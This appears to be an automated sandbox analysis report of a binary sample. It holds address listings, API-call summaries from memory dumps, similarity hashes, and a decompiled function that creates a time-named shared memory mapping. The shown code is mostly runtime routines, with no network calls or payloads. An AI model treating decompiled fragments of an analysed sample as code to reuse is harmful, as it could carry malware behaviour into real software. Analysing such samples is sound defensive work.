                                                                                                                                                                                                                                                              0x6e2024ce
                                                                                                                                                                                                                                                              0x6e2024d0
                                                                                                                                                                                                                                                              0x6e2024d3
                                                                                                                                                                                                                                                              0x6e2024d5
                                                                                                                                                                                                                                                              0x6e2024d5
                                                                                                                                                                                                                                                              0x6e2024d7
                                                                                                                                                                                                                                                              0x6e2024da
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2024dc
                                                                                                                                                                                                                                                              0x6e2024de
                                                                                                                                                                                                                                                              0x6e202544
                                                                                                                                                                                                                                                              0x6e202544
                                                                                                                                                                                                                                                              0x6e2026a2
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2026a2
                                                                                                                                                                                                                                                              0x6e2024e0
                                                                                                                                                                                                                                                              0x6e2024e0
                                                                                                                                                                                                                                                              0x6e2024e4
                                                                                                                                                                                                                                                              0x6e2024e6
                                                                                                                                                                                                                                                              0x6e2024e6
                                                                                                                                                                                                                                                              0x6e2024e6
                                                                                                                                                                                                                                                              0x6e2024e6
                                                                                                                                                                                                                                                              0x6e2024e9
                                                                                                                                                                                                                                                              0x6e2024ea
                                                                                                                                                                                                                                                              0x6e2024ed
                                                                                                                                                                                                                                                              0x6e2024ed
                                                                                                                                                                                                                                                              0x6e2024f1
                                                                                                                                                                                                                                                              0x6e2024f5
                                                                                                                                                                                                                                                              0x6e202503
                                                                                                                                                                                                                                                              0x6e202503
                                                                                                                                                                                                                                                              0x6e20250b
                                                                                                                                                                                                                                                              0x6e202511
                                                                                                                                                                                                                                                              0x6e202513
                                                                                                                                                                                                                                                              0x6e202515
                                                                                                                                                                                                                                                              0x6e202525
                                                                                                                                                                                                                                                              0x6e202532
                                                                                                                                                                                                                                                              0x6e202536
                                                                                                                                                                                                                                                              0x6e20253b
                                                                                                                                                                                                                                                              0x6e20253d
                                                                                                                                                                                                                                                              0x6e2025bb
                                                                                                                                                                                                                                                              0x6e2025bb
                                                                                                                                                                                                                                                              0x6e20253f
                                                                                                                                                                                                                                                              0x6e20253f
                                                                                                                                                                                                                                                              0x6e20253f
                                                                                                                                                                                                                                                              0x6e2025bd
                                                                                                                                                                                                                                                              0x6e2025bf
                                                                                                                                                                                                                                                              0x6e2026a0
                                                                                                                                                                                                                                                              0x6e2026a0
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2025c5
                                                                                                                                                                                                                                                              0x6e2025c5
                                                                                                                                                                                                                                                              0x6e2025cc
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2025d2
                                                                                                                                                                                                                                                              0x6e2025d6
                                                                                                                                                                                                                                                              0x6e202632
                                                                                                                                                                                                                                                              0x6e202634
                                                                                                                                                                                                                                                              0x6e20263c
                                                                                                                                                                                                                                                              0x6e20263e
                                                                                                                                                                                                                                                              0x6e202640
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202642
                                                                                                                                                                                                                                                              0x6e202648
                                                                                                                                                                                                                                                              0x6e20264a
                                                                                                                                                                                                                                                              0x6e20264c
                                                                                                                                                                                                                                                              0x6e202661
                                                                                                                                                                                                                                                              0x6e202661
                                                                                                                                                                                                                                                              0x6e202663
                                                                                                                                                                                                                                                              0x6e202692
                                                                                                                                                                                                                                                              0x6e202699
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202699
                                                                                                                                                                                                                                                              0x6e202667
                                                                                                                                                                                                                                                              0x6e202668
                                                                                                                                                                                                                                                              0x6e20266a
                                                                                                                                                                                                                                                              0x6e20266c
                                                                                                                                                                                                                                                              0x6e20266c
                                                                                                                                                                                                                                                              0x6e20266e
                                                                                                                                                                                                                                                              0x6e202670
                                                                                                                                                                                                                                                              0x6e202672
                                                                                                                                                                                                                                                              0x6e202686
                                                                                                                                                                                                                                                              0x6e202686
                                                                                                                                                                                                                                                              0x6e202689
                                                                                                                                                                                                                                                              0x6e20268b
                                                                                                                                                                                                                                                              0x6e20268b
                                                                                                                                                                                                                                                              0x6e20268c
                                                                                                                                                                                                                                                              0x6e20268c
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202674
                                                                                                                                                                                                                                                              0x6e202674
                                                                                                                                                                                                                                                              0x6e202674
                                                                                                                                                                                                                                                              0x6e20267d
                                                                                                                                                                                                                                                              0x6e20267e
                                                                                                                                                                                                                                                              0x6e202680
                                                                                                                                                                                                                                                              0x6e202682
                                                                                                                                                                                                                                                              0x6e202682
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202674
                                                                                                                                                                                                                                                              0x6e202672
                                                                                                                                                                                                                                                              0x6e20264e
                                                                                                                                                                                                                                                              0x6e202655
                                                                                                                                                                                                                                                              0x6e202655
                                                                                                                                                                                                                                                              0x6e202657
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202659
                                                                                                                                                                                                                                                              0x6e20265a
                                                                                                                                                                                                                                                              0x6e20265d
                                                                                                                                                                                                                                                              0x6e20265f
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e20265f
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202655
                                                                                                                                                                                                                                                              0x6e2025d8
                                                                                                                                                                                                                                                              0x6e2025db
                                                                                                                                                                                                                                                              0x6e2025e0
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2025e9
                                                                                                                                                                                                                                                              0x6e2025eb
                                                                                                                                                                                                                                                              0x6e2025f1
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2025f7
                                                                                                                                                                                                                                                              0x6e2025fd
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202603
                                                                                                                                                                                                                                                              0x6e202605
                                                                                                                                                                                                                                                              0x6e20260e
                                                                                                                                                                                                                                                              0x6e202612
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202618
                                                                                                                                                                                                                                                              0x6e20261b
                                                                                                                                                                                                                                                              0x6e20261d
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202624
                                                                                                                                                                                                                                                              0x6e202626
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202628
                                                                                                                                                                                                                                                              0x6e20262c
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e20262c
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202517
                                                                                                                                                                                                                                                              0x6e202517
                                                                                                                                                                                                                                                              0x6e202517
                                                                                                                                                                                                                                                              0x6e20251e
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202520
                                                                                                                                                                                                                                                              0x6e202521
                                                                                                                                                                                                                                                              0x6e202523
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202523
                                                                                                                                                                                                                                                              0x6e20254b
                                                                                                                                                                                                                                                              0x6e20254d
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e20255d
                                                                                                                                                                                                                                                              0x6e20255f
                                                                                                                                                                                                                                                              0x6e202561
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202567
                                                                                                                                                                                                                                                              0x6e20256e
                                                                                                                                                                                                                                                              0x6e20259a
                                                                                                                                                                                                                                                              0x6e20259a
                                                                                                                                                                                                                                                              0x6e20259c
                                                                                                                                                                                                                                                              0x6e20259e
                                                                                                                                                                                                                                                              0x6e2025b2
                                                                                                                                                                                                                                                              0x6e2025b4
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2025a0
                                                                                                                                                                                                                                                              0x6e2025a0
                                                                                                                                                                                                                                                              0x6e2025a0
                                                                                                                                                                                                                                                              0x6e2025a9
                                                                                                                                                                                                                                                              0x6e2025aa
                                                                                                                                                                                                                                                              0x6e2025ac
                                                                                                                                                                                                                                                              0x6e2025ae
                                                                                                                                                                                                                                                              0x6e2025ae
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2025a0
                                                                                                                                                                                                                                                              0x6e202570
                                                                                                                                                                                                                                                              0x6e202573
                                                                                                                                                                                                                                                              0x6e202575
                                                                                                                                                                                                                                                              0x6e202587
                                                                                                                                                                                                                                                              0x6e202587
                                                                                                                                                                                                                                                              0x6e20258a
                                                                                                                                                                                                                                                              0x6e20258c
                                                                                                                                                                                                                                                              0x6e20258c
                                                                                                                                                                                                                                                              0x6e20258d
                                                                                                                                                                                                                                                              0x6e20258d
                                                                                                                                                                                                                                                              0x6e202593
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202577
                                                                                                                                                                                                                                                              0x6e202577
                                                                                                                                                                                                                                                              0x6e202577
                                                                                                                                                                                                                                                              0x6e20257e
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202580
                                                                                                                                                                                                                                                              0x6e202580
                                                                                                                                                                                                                                                              0x6e202581
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202581
                                                                                                                                                                                                                                                              0x6e202583
                                                                                                                                                                                                                                                              0x6e202585
                                                                                                                                                                                                                                                              0x6e202598
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202598
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202585
                                                                                                                                                                                                                                                              0x6e2024f7
                                                                                                                                                                                                                                                              0x6e2024fa
                                                                                                                                                                                                                                                              0x6e2024fd
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2024ff
                                                                                                                                                                                                                                                              0x6e202501
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202501
                                                                                                                                                                                                                                                              0x6e2024c6
                                                                                                                                                                                                                                                              0x6e2024c8
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E202536
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471393143.000000006E201000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471383950.000000006E200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471419429.000000006E203000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471444834.000000006E205000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471467724.000000006E206000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: MemoryQueryVirtual
                                                                                                                                                                                                                                                              • String ID: @B n$@B n$@B n
                                                                                                                                                                                                                                                              • API String ID: 2850889275-3126468145
                                                                                                                                                                                                                                                              • Opcode ID: 86f46a2e9caeefc2a999a67b8af409545b82db6c7246ed0f0df1a05fb5364dcf
                                                                                                                                                                                                                                                              • Instruction ID: 6a21e0c664511740778f966bbbb358778dbe4c31d7e48aa62869721407b4cb8f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86f46a2e9caeefc2a999a67b8af409545b82db6c7246ed0f0df1a05fb5364dcf
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB61E5B2B1460B8FDB4ACEA9C8A075977B7EB85315F24856BD815C72C6E730D882CA50
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 6E25297E
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E2556CE
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E2556E0
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E2556F2
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E255704
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E255716
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E255728
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E25573A
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E25574C
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E25575E
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E255770
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E255782
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E255794
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E2557A6
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252973
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: HeapFree.KERNEL32(00000000,00000000,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?), ref: 6E24D6A0
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: GetLastError.KERNEL32(?,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?,?), ref: 6E24D6B2
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252995
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2529AA
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2529B5
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2529D7
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2529EA
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2529F8
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252A03
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252A3B
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252A42
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252A5F
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252A77
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                                                                                                                              • Opcode ID: 2706613bc3fe4d7871bb49d5b961138428d4b3bda9693c2543306a75642eae05
                                                                                                                                                                                                                                                              • Instruction ID: a1f6c58fbec234201d03a5bc36db65965b970f2bf4816e9e9d317b879f3df945
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2706613bc3fe4d7871bb49d5b961138428d4b3bda9693c2543306a75642eae05
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E317E7260430ADFEB648BB4D940B9673FABF00315F214919E859D7394DB31E8608F54
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 6E2495CB
                                                                                                                                                                                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 6E2495F2
                                                                                                                                                                                                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 6E2496FE
                                                                                                                                                                                                                                                              • CatchIt.LIBVCRUNTIME ref: 6E249753
                                                                                                                                                                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 6E2497D9
                                                                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 6E249860
                                                                                                                                                                                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 6E24987B
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                                                              • API String ID: 4234981820-393685449
                                                                                                                                                                                                                                                              • Opcode ID: b6b17fca80f3cb50e50b4d0ea7fb6e4f96aa1ff1f15266f60859f35ae1368ddf
                                                                                                                                                                                                                                                              • Instruction ID: 160249d89df068963552cd649ea77627728e6263509fd8de27253d315037fbcb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6b17fca80f3cb50e50b4d0ea7fb6e4f96aa1ff1f15266f60859f35ae1368ddf
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FCC1477580420FEFCF19CFE8CA80A9EBBBAAF44315B10455AE8156B215D731DA61CFA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D27E
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: HeapFree.KERNEL32(00000000,00000000,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?), ref: 6E24D6A0
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: GetLastError.KERNEL32(?,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?,?), ref: 6E24D6B2
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D28A
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D295
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2A0
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2AB
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2B6
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2C1
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2CC
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2D7
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2E5
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                              • Opcode ID: e6da5f92d362b55d93d3388bfef68d76fdb6f112e1e418cb8713eb5f4aefd41a
                                                                                                                                                                                                                                                              • Instruction ID: 1433ab1b34e22722da2806a0309129cf9853433b43f1ae47800fca3b43ae2161
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6da5f92d362b55d93d3388bfef68d76fdb6f112e1e418cb8713eb5f4aefd41a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E21747A94010CEFCF45DFE4D890DDE7BBAEF08244B0189A6F9199B121DB71EA558F80
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: ed48ab42cdfc7f54e1f5dbe88a92e965b5fc29f838d22fe3bf43e6c3d2509e9b
                                                                                                                                                                                                                                                              • Instruction ID: fb11d168f9d7ad919091496241c2ee8d314936071d988ac48877c6ab8e3cc270
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed48ab42cdfc7f54e1f5dbe88a92e965b5fc29f838d22fe3bf43e6c3d2509e9b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93C1CFB4A0420E9FDB05CFD9C994FAEBBB6BF4A319F004559E8149B381E7709951CF21
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6E2547C9
                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 6E2547D0
                                                                                                                                                                                                                                                              • GetFileType.KERNEL32(00000000), ref: 6E2547DC
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6E2547E6
                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 6E2547EF
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6E25480F
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(6E24FCD2), ref: 6E25495C
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6E25498E
                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 6E254995
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$CloseHandle$FileType
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 906505306-0
                                                                                                                                                                                                                                                              • Opcode ID: b9006c1d8732f3105f2e8705a93d003512ddecd5bd249dedc171e47035e52216
                                                                                                                                                                                                                                                              • Instruction ID: b4747a001a0e25d349a6aa39b7c936692d30086f903975729d345af36c96ff84
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9006c1d8732f3105f2e8705a93d003512ddecd5bd249dedc171e47035e52216
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FCA13432A1455D8FCF088FA8C955BAEBBB2AB07325F14014DE812AF390D7349837CB61
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                                                                                                                              			E6E201979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                                                                                              				struct _FILETIME* _v16;
                                                                                                                                                                                                                                                              				short _v60;
                                                                                                                                                                                                                                                              				struct _FILETIME* _t14;
                                                                                                                                                                                                                                                              				intOrPtr _t15;
                                                                                                                                                                                                                                                              				long _t18;
                                                                                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                                                                                              				intOrPtr _t31;
                                                                                                                                                                                                                                                              				long _t32;
                                                                                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                              				_t31 = __edx;
                                                                                                                                                                                                                                                              				_t14 =  &_v16;
                                                                                                                                                                                                                                                              				GetSystemTimeAsFileTime(_t14);
                                                                                                                                                                                                                                                              				_push(0x192);
                                                                                                                                                                                                                                                              				_push(0x54d38000);
                                                                                                                                                                                                                                                              				_push(_v12);
                                                                                                                                                                                                                                                              				_push(_v16);
                                                                                                                                                                                                                                                              				L6E202210();
                                                                                                                                                                                                                                                              				_push(_t14);
                                                                                                                                                                                                                                                              				_v16 = _t14;
                                                                                                                                                                                                                                                              				_t15 =  *0x6e2041d0;
                                                                                                                                                                                                                                                              				_push(_t15 + 0x6e20505e);
                                                                                                                                                                                                                                                              				_push(_t15 + 0x6e205054);
                                                                                                                                                                                                                                                              				_push(0x16);
                                                                                                                                                                                                                                                              				_push( &_v60);
                                                                                                                                                                                                                                                              				_v12 = _t31;
                                                                                                                                                                                                                                                              				L6E20220A();
                                                                                                                                                                                                                                                              				_t18 = _a4;
                                                                                                                                                                                                                                                              				if(_t18 == 0) {
                                                                                                                                                                                                                                                              					_t18 = 0x1000;
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				_t34 = CreateFileMappingW(0xffffffff, 0x6e2041c0, 4, 0, _t18,  &_v60);
                                                                                                                                                                                                                                                              				if(_t34 == 0) {
                                                                                                                                                                                                                                                              					_t32 = GetLastError();
                                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                                              					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                                                                                                                                                                                                              						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
                                                                                                                                                                                                                                                              						if(_t22 == 0) {
                                                                                                                                                                                                                                                              							_t32 = GetLastError();
                                                                                                                                                                                                                                                              							if(_t32 != 0) {
                                                                                                                                                                                                                                                              								goto L9;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                                              							 *_a8 = _t34;
                                                                                                                                                                                                                                                              							 *_a12 = _t22;
                                                                                                                                                                                                                                                              							_t32 = 0;
                                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                                              						_t32 = 2;
                                                                                                                                                                                                                                                              						L9:
                                                                                                                                                                                                                                                              						CloseHandle(_t34);
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				return _t32;
                                                                                                                                                                                                                                                              			}













                                                                                                                                                                                                                                                              0x6e201979
                                                                                                                                                                                                                                                              0x6e201982
                                                                                                                                                                                                                                                              0x6e201986
                                                                                                                                                                                                                                                              0x6e20198c
                                                                                                                                                                                                                                                              0x6e201991
                                                                                                                                                                                                                                                              0x6e201996
                                                                                                                                                                                                                                                              0x6e201999
                                                                                                                                                                                                                                                              0x6e20199c
                                                                                                                                                                                                                                                              0x6e2019a1
                                                                                                                                                                                                                                                              0x6e2019a2
                                                                                                                                                                                                                                                              0x6e2019a5
                                                                                                                                                                                                                                                              0x6e2019b0
                                                                                                                                                                                                                                                              0x6e2019b7
                                                                                                                                                                                                                                                              0x6e2019bb
                                                                                                                                                                                                                                                              0x6e2019bd
                                                                                                                                                                                                                                                              0x6e2019be
                                                                                                                                                                                                                                                              0x6e2019c1
                                                                                                                                                                                                                                                              0x6e2019c6
                                                                                                                                                                                                                                                              0x6e2019d0
                                                                                                                                                                                                                                                              0x6e2019d2
                                                                                                                                                                                                                                                              0x6e2019d2
                                                                                                                                                                                                                                                              0x6e2019ec
                                                                                                                                                                                                                                                              0x6e2019f0
                                                                                                                                                                                                                                                              0x6e201a40
                                                                                                                                                                                                                                                              0x6e2019f2
                                                                                                                                                                                                                                                              0x6e2019fb
                                                                                                                                                                                                                                                              0x6e201a11
                                                                                                                                                                                                                                                              0x6e201a19
                                                                                                                                                                                                                                                              0x6e201a2b
                                                                                                                                                                                                                                                              0x6e201a2f
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201a1b
                                                                                                                                                                                                                                                              0x6e201a1e
                                                                                                                                                                                                                                                              0x6e201a23
                                                                                                                                                                                                                                                              0x6e201a25
                                                                                                                                                                                                                                                              0x6e201a25
                                                                                                                                                                                                                                                              0x6e201a06
